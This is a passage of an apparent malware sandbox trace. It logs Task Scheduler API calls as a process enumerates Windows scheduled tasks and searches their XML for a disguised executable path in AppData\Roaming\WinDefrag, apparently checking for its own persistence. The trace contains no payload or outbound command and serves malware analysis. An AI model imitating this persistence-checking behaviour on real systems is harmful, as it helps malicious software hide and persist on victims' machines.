| out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.744] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.744] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.744] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.744] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.744] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.745] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=0) returned 0x0 [0169.745] IUnknown:Release (This=0x328100) returned 0x0 [0169.745] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.747] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.747] IUnknown:Release (This=0x328100) returned 0x0 [0169.747] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.747] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.747] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.753] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.753] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.753] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="Background Synchronization") returned 0x0 [0169.753] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0169.764] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.765] IUnknown:Release (This=0x328250) returned 0x0 [0169.765] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.765] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="Logon Synchronization") returned 0x0 [0169.765] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0169.769] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.769] IUnknown:Release (This=0x328250) returned 0x0 [0169.769] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.769] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.770] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.770] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.770] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.771] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.771] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.773] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.773] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.773] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="BackgroundConfigSurveyor") returned 0x0 [0169.773] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n") returned 0x0 [0169.777] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.777] IUnknown:Release (This=0x328240) returned 0x0 [0169.777] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.777] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.779] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.779] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.779] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.779] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.779] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.780] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=0) returned 0x0 [0169.780] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.780] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.782] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=1) returned 0x0 [0169.782] ITaskFolderCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x18e220 | out: ppFolder=0x18e220*=0x328230) returned 0x0 [0169.782] ITaskFolder:GetTasks (in: This=0x328230, flags=1, ppTasks=0x18e0b0 | out: ppTasks=0x18e0b0*=0x3282d0) returned 0x0 [0169.784] IRegisteredTaskCollection:get_Count (in: This=0x3282d0, pCount=0x18e200 | out: pCount=0x18e200*=0) returned 0x0 [0169.784] IUnknown:Release (This=0x3282d0) returned 0x0 [0169.784] ITaskFolder:GetFolders (in: This=0x328230, flags=0, ppFolders=0x18e098 | out: ppFolders=0x18e098*=0x3282d0) returned 0x0 [0169.785] ITaskFolderCollection:get_Count (in: This=0x3282d0, pCount=0x18e218 | out: pCount=0x18e218*=0) returned 0x0 [0169.786] IUnknown:Release (This=0x3282d0) returned 0x0 [0169.786] TaskScheduler:IUnknown:Release (This=0x328230) returned 0x0 [0169.786] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.786] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.786] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.786] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328110) returned 0x0 [0169.788] IRegisteredTaskCollection:get_Count (in: This=0x328110, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.788] IRegisteredTaskCollection:get_Item (in: This=0x328110, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328280) returned 0x0 [0169.788] IRegisteredTask:get_Name (in: This=0x328280, pName=0x18e230 | out: pName=0x18e230*="AnalyzeSystem") returned 0x0 [0169.788] IRegisteredTask:get_Xml (in: This=0x328280, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n") returned 0x0 [0169.797] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.798] IUnknown:Release (This=0x328280) returned 0x0 [0169.798] IUnknown:Release (This=0x328110) returned 0x0 [0169.798] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328110) returned 0x0 [0169.799] ITaskFolderCollection:get_Count (in: This=0x328110, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.799] IUnknown:Release (This=0x328110) returned 0x0 [0169.799] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.799] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.799] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.802] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.802] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328220) returned 0x0 [0169.802] IRegisteredTask:get_Name (in: This=0x328220, pName=0x18e230 | out: pName=0x18e230*="RacTask") returned 0x0 [0169.802] IRegisteredTask:get_Xml (in: This=0x328220, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n") returned 0x0 [0169.807] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.808] IUnknown:Release (This=0x328220) returned 0x0 [0169.808] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.808] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.809] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.809] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.809] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.809] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.809] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.811] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.811] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328220) returned 0x0 [0169.811] IRegisteredTask:get_Name (in: This=0x328220, pName=0x18e230 | out: pName=0x18e230*="MobilityManager") returned 0x0 [0169.811] IRegisteredTask:get_Xml (in: This=0x328220, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n") returned 0x0 [0169.814] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.815] IUnknown:Release (This=0x328220) returned 0x0 [0169.815] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.815] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.816] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.816] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.816] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.816] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.816] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.818] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.818] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.818] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="RegIdleBackup") returned 0x0 [0169.818] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n") returned 0x0 [0169.822] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.822] IUnknown:Release (This=0x328230) returned 0x0 [0169.823] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.823] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.824] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.824] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.824] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.824] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.824] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328120) returned 0x0 [0169.825] IRegisteredTaskCollection:get_Count (in: This=0x328120, pCount=0x18e390 | out: pCount=0x18e390*=0) returned 0x0 [0169.825] IUnknown:Release (This=0x328120) returned 0x0 [0169.825] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328120) returned 0x0 [0169.827] ITaskFolderCollection:get_Count (in: This=0x328120, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.827] IUnknown:Release (This=0x328120) returned 0x0 [0169.827] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.827] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.827] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.829] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.829] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.829] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="RemoteAssistanceTask") returned 0x0 [0169.829] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n 